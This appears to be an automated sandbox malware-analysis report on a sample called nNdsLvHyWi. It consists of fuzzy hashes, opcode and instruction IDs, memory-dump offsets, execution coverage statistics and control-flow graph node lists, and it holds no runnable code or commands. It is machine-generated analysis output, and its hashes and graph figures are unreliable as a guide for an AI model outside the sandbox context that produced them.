                                          • API String ID:
                                          • Opcode ID: 0230ab68a64246cb24286274e2f586a46a65f1230068b2935e810eb4ed6fd404
                                          • Instruction ID: 2f8f50c12c2eda746400b980a5f1a5a8abb7a27e969d52755aff089ddfbc89ec
                                          • Opcode Fuzzy Hash: 0230ab68a64246cb24286274e2f586a46a65f1230068b2935e810eb4ed6fd404
                                          • Instruction Fuzzy Hash: 6B11C274911508EFCB40DFA9F189998BBF0FF48310F5281D4D884AB325DB349AA0CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a4877df400b7f7875dd2f73c687e3d8dc59bdf7a60478535f1b9442adf0a184
                                          • Instruction ID: 5c2ed0e18b4620bbbfd0ba06e3fa07a4d49f8a110e339200e89a41cb4466c90f
                                          • Opcode Fuzzy Hash: 3a4877df400b7f7875dd2f73c687e3d8dc59bdf7a60478535f1b9442adf0a184
                                          • Instruction Fuzzy Hash: F6018FB4D00208EFCB44EFAAE5046AEBBF5FBC8300F10C565D81897304D7B85A41CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 256917714be7b8c19f80fe339f643474997bdb5129f44a07069ca38e34e3d69a
                                          • Instruction ID: 9e2097ce01800f099a47cfee344df6f7e615a77c56b66dbb91f572d49191c66e
                                          • Opcode Fuzzy Hash: 256917714be7b8c19f80fe339f643474997bdb5129f44a07069ca38e34e3d69a
                                          • Instruction Fuzzy Hash: 14F0A07141D388AFD7068BB0AC266A93FF8EB0B101B1142D7D148CB162EA74491AC753
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 685701061b2c32ed41197300e501fd04c1ab6014de6f840112abe097ddff1bb8
                                          • Instruction ID: 21879808a04c4ba9639762cc0abbc5d612ccf5a9b99b1877fe850f5a545f473a
                                          • Opcode Fuzzy Hash: 685701061b2c32ed41197300e501fd04c1ab6014de6f840112abe097ddff1bb8
                                          • Instruction Fuzzy Hash: ABF01DB4D0420CEFDB84DFE9E4456AEBBB4FB49700F0095AAD818A7300E7745A44CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: daacc27a00b95fd7a47984787fa26a3276264acc1ef994bae8a6e6084c6476fe
                                          • Instruction ID: a18ce534d9404f7c1ffdb30e71543fa43a459a0ca060183d5d211eed17b0e6af
                                          • Opcode Fuzzy Hash: daacc27a00b95fd7a47984787fa26a3276264acc1ef994bae8a6e6084c6476fe
                                          • Instruction Fuzzy Hash: 4AF0A074D09248EFDB04EF70F8169EDBF78FB06200F01419AD8445B261CB705A46D7A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 388de10d5e1e5eb3012c9ae4e55ee71346d2edeaf236e6bcc64cc99474f79fb2
                                          • Instruction ID: 5dd89ccbabc4bac796d954c79ef309d3f72e055641b2b760eb0b7aff93fdb9b7
                                          • Opcode Fuzzy Hash: 388de10d5e1e5eb3012c9ae4e55ee71346d2edeaf236e6bcc64cc99474f79fb2
                                          • Instruction Fuzzy Hash: 20F05EB4D08348AFD740DFA8E4512ACFBF4EB89210F2080AAC888D7252D6759A56CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f86daa22047d0051f49cc23f35790222927533a64fa6b3c7c97f056fe124763b
                                          • Instruction ID: a623accb5e47a5f8f9d01c4969d16e0a52e8b96a7bd09df6ab7ac3873c012f4f
                                          • Opcode Fuzzy Hash: f86daa22047d0051f49cc23f35790222927533a64fa6b3c7c97f056fe124763b
                                          • Instruction Fuzzy Hash: 24E09279A08248AFC754DBE4F456AACBBB4AB46304F1081DEC8441B252DA715F82C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5382c399fd2f81c4261c62627aab0d07df7ced378bc9b46c2f6d9a958f97e2a4
                                          • Instruction ID: cdd6dc62e6a492c77c0eac387037e9e0633d42997bd96ac6dc17cb6728773ad9
                                          • Opcode Fuzzy Hash: 5382c399fd2f81c4261c62627aab0d07df7ced378bc9b46c2f6d9a958f97e2a4
                                          • Instruction Fuzzy Hash: F7E04834D0420CEBC748EF50F8055ADBB79AB46311F105158D8451B260CB705E55D7A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5547dd50568ed65caf61be896765270716f2a2883c9056ec3584ff6c3b4b5237
                                          • Instruction ID: f96a9c0b1db2d3c864c83aa1816eb09761dd9ec85e5bba65bb2cbeade40e6b8f
                                          • Opcode Fuzzy Hash: 5547dd50568ed65caf61be896765270716f2a2883c9056ec3584ff6c3b4b5237
                                          • Instruction Fuzzy Hash: C0E0E538D04208EFCB84DFA9E448A9CBBB4FF48300F1081AAE8495B320D7719E54DF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 278cb15adffb8679d6a9feac2b74410a1b596cb79b476f6449022edbb6ea3e53
                                          • Instruction ID: 8d3314738c3d78fda7890716dac86d19558a5ece309e4c3cffb69344d3ef0d24
                                          • Opcode Fuzzy Hash: 278cb15adffb8679d6a9feac2b74410a1b596cb79b476f6449022edbb6ea3e53
                                          • Instruction Fuzzy Hash: 7AE0E5B4E08208EFDB84DFA8E4456ACBBF5EB88200F10C1A9984897350D7759A42CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 878fb0c6fd2638fce21932384b892a6eed8a71379f24fefe93cff400752eef21
                                          • Instruction ID: fa6ae532a4abf2be27b4ee5c739aa7adefaef147c971409e5690e9756f703f23
                                          • Opcode Fuzzy Hash: 878fb0c6fd2638fce21932384b892a6eed8a71379f24fefe93cff400752eef21
                                          • Instruction Fuzzy Hash: 90E0C2B185510CFBC780DFA5E80069E77FCEB09200F0009A5D1059B110EBB08A14D792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d643379a268db6ef426c4ebc40292dba39b0c19a0d90f8a6b1c78b74f0c8177
                                          • Instruction ID: 7fe6d8796086949a65dae22049c4291226e108f5b27ccbd3026104bd158e5eae
                                          • Opcode Fuzzy Hash: 1d643379a268db6ef426c4ebc40292dba39b0c19a0d90f8a6b1c78b74f0c8177
                                          • Instruction Fuzzy Hash: 11E0C2B181424CEFCB40DFE0E81969D7BFCEB49201F1056A5D5098B120EFB14A10D782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 899bd6bd9a2edb0d75c1d952aff88a0d2bbdc0270069c338d8abeba56cacc0c9
                                          • Instruction ID: e3e94b7535b3fb09e0f6731fadc34ca7fb848b51f183c0b44e6242d1e278998b
                                          • Opcode Fuzzy Hash: 899bd6bd9a2edb0d75c1d952aff88a0d2bbdc0270069c338d8abeba56cacc0c9
                                          • Instruction Fuzzy Hash: 71E0EC74D59218EFC784EFA8E54969CBBB4AB08201F1001AAC949D7350E7745B54CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a2037e15be5d5f04be0db24e6c247e3fcc3871133c6b3e104b29ed56f67bc3c
                                          • Instruction ID: 0e3c63dbc82e8c580f7b3b368b1ccdf2bfdc64c315207ae4c971e54b2ae8d3f3
                                          • Opcode Fuzzy Hash: 5a2037e15be5d5f04be0db24e6c247e3fcc3871133c6b3e104b29ed56f67bc3c
                                          • Instruction Fuzzy Hash: E0E08C74A08208EFC744DFD4F54566CBBB8AB86300F1081EC88081B340CB719E42CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89d7740060ee4b1f718d6d1e3fd8753d718f94e253b44b0401070de36773bc0f
                                          • Instruction ID: 3f8733e9ed9233511ed8edc3d6576046decb888249719aa38a87b66ab03d8f12
                                          • Opcode Fuzzy Hash: 89d7740060ee4b1f718d6d1e3fd8753d718f94e253b44b0401070de36773bc0f
                                          • Instruction Fuzzy Hash: 83E09A70901219CFEB64DF15ED58BDA7BB1BB48301F004699D40DA6250C7B91E81CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.2150504044.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_6d10000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a6c2b9e5170fa177f0b5d7e6d55c674ed40f5dea736d8824f4c259586116dcd
                                          • Instruction ID: 6bf77606dad0749a1e8b0d14ba281f11ba0b135ddebb7b92f087b864ec86f9db
                                          • Opcode Fuzzy Hash: 6a6c2b9e5170fa177f0b5d7e6d55c674ed40f5dea736d8824f4c259586116dcd
                                          • Instruction Fuzzy Hash: 65B0927A258640A6B1842AA85C45EAA7861AFA1B04B00A80523881006489A0E664D15F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:12.5%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:40
                                          Total number of Limit Nodes:5
                                          execution_graph 24118 de0848 24120 de084e 24118->24120 24119 de091b 24120->24119 24123 de1383 24120->24123 24130 de1490 24120->24130 24125 de1396 24123->24125 24124 de1488 24124->24120 24125->24124 24126 de1490 2 API calls 24125->24126 24138 de7d48 24125->24138 24142 de7eb8 24125->24142 24149 de7da0 24125->24149 24126->24125 24132 de1396 24130->24132 24133 de1497 24130->24133 24131 de1488 24131->24120 24132->24131 24134 de7eb8 2 API calls 24132->24134 24135 de7d48 2 API calls 24132->24135 24136 de7da0 2 API calls 24132->24136 24137 de1490 2 API calls 24132->24137 24133->24120 24134->24132 24135->24132 24136->24132 24137->24132 24140 de7db6 24138->24140 24139 de7f22 24139->24125 24140->24139 24153 def4c7 24140->24153 24143 de7ec2 24142->24143 24144 de7edc 24143->24144 24145 65bfab8 2 API calls 24143->24145 24146 65bfaa8 2 API calls 24143->24146 24147 de7f22 24144->24147 24148 def4c7 2 API calls 24144->24148 24145->24144 24146->24144 24147->24125 24148->24147 24151 de7db6 24149->24151 24150 de7f22 24150->24125 24151->24150 24152 def4c7 2 API calls 24151->24152 24152->24150 24154 def4d2 24153->24154 24158 65bfab8 24154->24158 24162 65bfaa8 24154->24162 24155 def4d9 24155->24139 24159 65bfacd 24158->24159 24160 65bfce2 24159->24160 24161 65bfcf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24159->24161 24160->24155 24161->24159 24164 65bfacd 24162->24164 24163 65bfce2 24163->24155 24164->24163 24165 65bfcf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 24164->24165 24165->24164

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 65b55e0-65b55fd 98 65b55ff-65b5602 97->98 99 65b5628-65b562b 98->99 100 65b5604-65b5623 98->100 101 65b562d-65b5630 99->101 102 65b5635-65b5638 99->102 100->99 101->102 104 65b563a-65b5649 102->104 105 65b564e-65b5651 102->105 104->105 106 65b565d-65b5660 105->106 107 65b5653-65b565c 105->107 108 65b567a-65b567d 106->108 109 65b5662-65b566c 106->109 112 65b567f-65b5681 108->112 113 65b5684-65b5687 108->113 114 65b5673-65b5675 109->114 112->113 115 65b5689-65b568f 113->115 116 65b56bf-65b56c2 113->116 114->108 117 65b57af-65b57db 115->117 118 65b5695-65b569d 115->118 119 65b56d1-65b56d4 116->119 120 65b56c4-65b56ca 116->120 131 65b57e5-65b57e8 117->131 118->117 121 65b56a3-65b56b0 118->121 123 65b56e2-65b56e5 119->123 124 65b56d6-65b56dd 119->124 120->115 122 65b56cc 120->122 121->117 128 65b56b6-65b56ba 121->128 122->119 125 65b56f9-65b56fc 123->125 126 65b56e7-65b56f4 123->126 124->123 125->120 129 65b56fe-65b5701 125->129 126->125 128->116 132 65b570b-65b570e 129->132 133 65b5703-65b5706 129->133 134 65b57ea-65b57f4 131->134 135 65b57f9-65b57fc 131->135 136 65b5710-65b5711 132->136 137 65b5716-65b5719 132->137 133->132 134->135 138 65b581e-65b5821 135->138 139 65b57fe-65b5802 135->139 136->137 140 65b571b-65b572d 137->140 141 65b5732-65b5735 137->141 145 65b5843-65b5846 138->145 146 65b5823-65b5827 138->146 143 65b5808-65b5810 139->143 144 65b58d6-65b5914 139->144 140->141 147 65b5752-65b5755 141->147 148 65b5737-65b574d 141->148 143->144 151 65b5816-65b5819 143->151 168 65b5916-65b5919 144->168 154 65b5848-65b584c 145->154 155 65b5864-65b5867 145->155 146->144 153 65b582d-65b5835 146->153 149 65b576e-65b5774 147->149 150 65b5757-65b575a 147->150 148->147 149->109 162 65b577a 149->162 157 65b5769-65b576c 150->157 158 65b575c-65b5762 150->158 151->138 153->144 163 65b583b-65b583e 153->163 154->144 156 65b5852-65b585a 154->156 159 65b5869-65b587a 155->159 160 65b587f-65b5882 155->160 156->144 165 65b585c-65b585f 156->165 157->149 167 65b577f-65b5782 157->167 158->133 166 65b5764 158->166 159->160 169 65b5892-65b5895 160->169 170 65b5884-65b588b 160->170 162->167 163->145 165->155 166->157 174 65b578f-65b5791 167->174 175 65b5784-65b5788 167->175 172 65b591f-65b5ab3 168->172 173 65b5c02-65b5c05 168->173 178 65b58af-65b58b2 169->178 179 65b5897-65b589b 169->179 176 65b58ce-65b58d5 170->176 177 65b588d 170->177 246 65b5ab9-65b5ac0 172->246 247 65b5bec-65b5bff 172->247 173->172 180 65b5c0b-65b5c0e 173->180 183 65b5798-65b579b 174->183 184 65b5793 174->184 181 65b578a 175->181 182 65b57a1-65b57ae 175->182 177->169 186 65b58bc-65b58be 178->186 187 65b58b4-65b58bb 178->187 179->144 185 65b589d-65b58a5 179->185 190 65b5c18-65b5c1b 180->190 191 65b5c10-65b5c15 180->191 181->174 183->98 183->182 184->183 185->144 193 65b58a7-65b58aa 185->193 188 65b58c0 186->188 189 65b58c5-65b58c8 186->189 188->189 189->131 189->176 194 65b5c1d-65b5c30 190->194 195 65b5c33-65b5c36 190->195 191->190 193->178 195->172 196 65b5c3c-65b5c3f 195->196 199 65b5c59-65b5c5c 196->199 200 65b5c41-65b5c52 196->200 201 65b5c6a-65b5c6d 199->201 202 65b5c5e-65b5c65 199->202 200->202 209 65b5c54 200->209 204 65b5c6f-65b5c80 201->204 205 65b5c87-65b5c8a 201->205 202->201 204->194 217 65b5c82 204->217 207 65b5c8c-65b5c9d 205->207 208 65b5ca4-65b5ca7 205->208 207->202 221 65b5c9f 207->221 212 65b5ca9-65b5cba 208->212 213 65b5cc1-65b5cc4 208->213 209->199 212->207 223 65b5cbc 212->223 215 65b5cde-65b5ce1 213->215 216 65b5cc6-65b5cd7 213->216 219 65b5cef-65b5cf1 215->219 220 65b5ce3-65b5cea 215->220 216->202 228 65b5cd9 216->228 217->205 226 65b5cf8-65b5cfb 219->226 227 65b5cf3 219->227 220->219 221->208 223->213 226->168 229 65b5d01-65b5d0a 226->229 227->226 228->215 248 65b5ac6-65b5af9 246->248 249 65b5b74-65b5b7b 246->249 260 65b5afb 248->260 261 65b5afe-65b5b3f 248->261 249->247 251 65b5b7d-65b5bb0 249->251 262 65b5bb2 251->262 263 65b5bb5-65b5be2 251->263 260->261 271 65b5b41-65b5b52 261->271 272 65b5b57-65b5b5e 261->272 262->263 263->229 271->229 274 65b5b66-65b5b68 272->274 274->229
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $
                                          • API String ID: 0-3993045852
                                          • Opcode ID: b9b3a32fcf6afde0049303668fe7563a6fd583c980450f1b82e2bd7b609e453f
                                          • Instruction ID: 31580ca9899fe9ea31b7ae936fdde2abc64e666546d59ea30825aaa8a6389534
                                          • Opcode Fuzzy Hash: b9b3a32fcf6afde0049303668fe7563a6fd583c980450f1b82e2bd7b609e453f
                                          • Instruction Fuzzy Hash: 3F22A231F002199FDF68DFA4C4906EEBBB2FF85310F248469E505AB285EA75DD46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cf3c1c55fe8a1c44d08067aea080dd61f32f601831d3f5efdea5c9a2345bc4ee
                                          • Instruction ID: 8727b5f49452aa5d37e24562ae7ddeb8f0267876751ae30d8d35dc72739ed9ec
                                          • Opcode Fuzzy Hash: cf3c1c55fe8a1c44d08067aea080dd61f32f601831d3f5efdea5c9a2345bc4ee
                                          • Instruction Fuzzy Hash: 1C924734A00204CFDB64DB68C584AADB7F2FB49310F5594A9D409EB3A1DB75ED82CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4391d60b2e95dc1f1bee4743b98ad6c7b1cb00e0fb0fec1de6703018ba0b3e7f
                                          • Instruction ID: 09c0b4ad63627a04e07b0b5242c9f541af320ae57e557b2913c3b4f02617ea04
                                          • Opcode Fuzzy Hash: 4391d60b2e95dc1f1bee4743b98ad6c7b1cb00e0fb0fec1de6703018ba0b3e7f
                                          • Instruction Fuzzy Hash: 77628B34A00209CFDB54EB68D980AADB7B2FF89310F149469E506AB391DB75ED46CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1531 65bc1f0-65bc210 1532 65bc212-65bc215 1531->1532 1533 65bc23e-65bc241 1532->1533 1534 65bc217-65bc239 1532->1534 1535 65bc259-65bc25c 1533->1535 1536 65bc243-65bc254 1533->1536 1534->1533 1538 65bc288-65bc28b 1535->1538 1539 65bc25e-65bc283 1535->1539 1536->1535 1540 65bc2ab-65bc2ae 1538->1540 1541 65bc28d-65bc2a6 1538->1541 1539->1538 1544 65bc4b3-65bc4bc 1540->1544 1545 65bc2b4-65bc2b7 1540->1545 1541->1540 1547 65bc32f-65bc338 1544->1547 1548 65bc4c2 1544->1548 1550 65bc2b9-65bc2dd 1545->1550 1551 65bc2e2-65bc2e5 1545->1551 1557 65bc33e-65bc342 1547->1557 1558 65bc587-65bc5bd 1547->1558 1556 65bc4c7-65bc4ca 1548->1556 1550->1551 1553 65bc2e7-65bc2ee 1551->1553 1554 65bc2f5-65bc2f8 1551->1554 1559 65bc2fa-65bc2fd 1553->1559 1560 65bc2f0 1553->1560 1554->1559 1561 65bc302-65bc305 1554->1561 1562 65bc4cc-65bc4d5 1556->1562 1563 65bc4e7-65bc4ea 1556->1563 1565 65bc347-65bc34a 1557->1565 1578 65bc5bf-65bc5c2 1558->1578 1559->1561 1560->1554 1568 65bc30f-65bc312 1561->1568 1569 65bc307-65bc30c 1561->1569 1562->1558 1570 65bc4db-65bc4e2 1562->1570 1571 65bc4ec-65bc4f2 1563->1571 1572 65bc4f7-65bc4fa 1563->1572 1573 65bc34c-65bc355 1565->1573 1574 65bc360-65bc363 1565->1574 1579 65bc32a-65bc32d 1568->1579 1580 65bc314-65bc325 1568->1580 1569->1568 1570->1563 1571->1572 1581 65bc4fc-65bc520 1572->1581 1582 65bc525-65bc528 1572->1582 1573->1562 1575 65bc35b 1573->1575 1576 65bc370-65bc373 1574->1576 1577 65bc365-65bc36b 1574->1577 1575->1574 1584 65bc393-65bc396 1576->1584 1585 65bc375-65bc38e 1576->1585 1577->1576 1588 65bc5ee-65bc5f1 1578->1588 1589 65bc5c4-65bc5dd 1578->1589 1579->1547 1579->1565 1580->1579 1581->1582 1586 65bc53a-65bc53d 1582->1586 1587 65bc52a-65bc535 1582->1587 1590 65bc398-65bc3b1 1584->1590 1591 65bc3b6-65bc3b9 1584->1591 1585->1584 1592 65bc53f-65bc558 1586->1592 1593 65bc55d-65bc560 1586->1593 1587->1586 1595 65bc5f3-65bc60f 1588->1595 1596 65bc614-65bc617 1588->1596 1626 65bc5e3-65bc5ed 1589->1626 1627 65bc677-65bc683 1589->1627 1590->1591 1604 65bc3bb-65bc3ca 1591->1604 1605 65bc3d1-65bc3d4 1591->1605 1592->1593 1606 65bc56a-65bc56c 1593->1606 1607 65bc562-65bc567 1593->1607 1595->1596 1599 65bc619-65bc623 1596->1599 1600 65bc624-65bc627 1596->1600 1612 65bc629-65bc642 1600->1612 1613 65bc647-65bc64a 1600->1613 1635 65bc3cc 1604->1635 1636 65bc441-65bc444 1604->1636 1608 65bc3f7-65bc3fa 1605->1608 1609 65bc3d6-65bc3f2 1605->1609 1616 65bc56e 1606->1616 1617 65bc573-65bc576 1606->1617 1607->1606 1619 65bc3fc-65bc421 1608->1619 1620 65bc426-65bc429 1608->1620 1609->1608 1612->1613 1622 65bc64c-65bc65a 1613->1622 1623 65bc665-65bc667 1613->1623 1616->1617 1617->1532 1618 65bc57c-65bc586 1617->1618 1619->1620 1628 65bc42b-65bc42e 1620->1628 1629 65bc433-65bc436 1620->1629 1622->1589 1649 65bc660 1622->1649 1633 65bc669 1623->1633 1634 65bc66e-65bc671 1623->1634 1637 65bc689-65bc692 1627->1637 1638 65bc823-65bc82d 1627->1638 1628->1629 1629->1573 1640 65bc43c-65bc43f 1629->1640 1633->1634 1634->1578 1634->1627 1635->1605 1641 65bc449-65bc44c 1636->1641 1643 65bc698-65bc6b8 1637->1643 1644 65bc82e-65bc83c 1637->1644 1640->1636 1640->1641 1646 65bc4ae-65bc4b1 1641->1646 1647 65bc44e-65bc4a9 1641->1647 1662 65bc6be-65bc6c7 1643->1662 1663 65bc811-65bc81d 1643->1663 1655 65bc83e-65bc866 1644->1655 1656 65bc7d3-65bc7d5 1644->1656 1646->1544 1646->1556 1647->1646 1649->1623 1661 65bc868-65bc86b 1655->1661 1658 65bc7e3 1656->1658 1659 65bc7d7-65bc7e1 1656->1659 1664 65bc7e8-65bc7ea 1658->1664 1659->1664 1665 65bc871-65bc87f 1661->1665 1666 65bca27-65bca2a 1661->1666 1662->1644 1667 65bc6cd-65bc6fc call 65b65d8 1662->1667 1663->1637 1663->1638 1668 65bc7ff-65bc80b 1664->1668 1669 65bc7ec-65bc7f8 1664->1669 1675 65bc886-65bc888 1665->1675 1671 65bca4d-65bca4f 1666->1671 1672 65bca2c-65bca48 1666->1672 1693 65bc73e-65bc754 1667->1693 1694 65bc6fe-65bc736 1667->1694 1668->1662 1668->1663 1669->1668 1673 65bca51 1671->1673 1674 65bca56-65bca59 1671->1674 1672->1671 1673->1674 1674->1661 1676 65bca5f-65bca68 1674->1676 1681 65bc88a-65bc88d 1675->1681 1682 65bc89f-65bc8c9 1675->1682 1681->1676 1691 65bc8cf-65bc8d8 1682->1691 1692 65bca1c-65bca26 1682->1692 1696 65bc8de-65bc9ed call 65b65d8 1691->1696 1697 65bc9f5-65bca1a 1691->1697 1702 65bc772-65bc788 1693->1702 1703 65bc756-65bc76a 1693->1703 1694->1693 1696->1691 1740 65bc9f3 1696->1740 1697->1676 1709 65bc78a-65bc79e 1702->1709 1710 65bc7a6-65bc7b9 1702->1710 1703->1702 1709->1710 1716 65bc7bb-65bc7c5 1710->1716 1717 65bc7c7 1710->1717 1720 65bc7cc-65bc7ce 1716->1720 1717->1720 1720->1668 1721 65bc7d0 1720->1721 1721->1656 1740->1692
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.4545420049.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_65b0000_nNdsLvHyWi.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc1d81c3620b34c9e0345e15d73a5983932d20cb8ce5b74f235f64c11f03b9d8
                                          • Instruction ID: bec0545f2c03e8a71fb913b204cc9c9c9f4ba5943dd75e9e4d843de63512724d
                                          • Opcode Fuzzy Hash: dc1d81c3620b34c9e0345e15d73a5983932d20cb8ce5b74f235f64c11f03b9d8
                                          • Instruction Fuzzy Hash: EE327034B001068FDB54EB68D890BAEBBB2FB89310F119529E505EB395DB75EC42CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
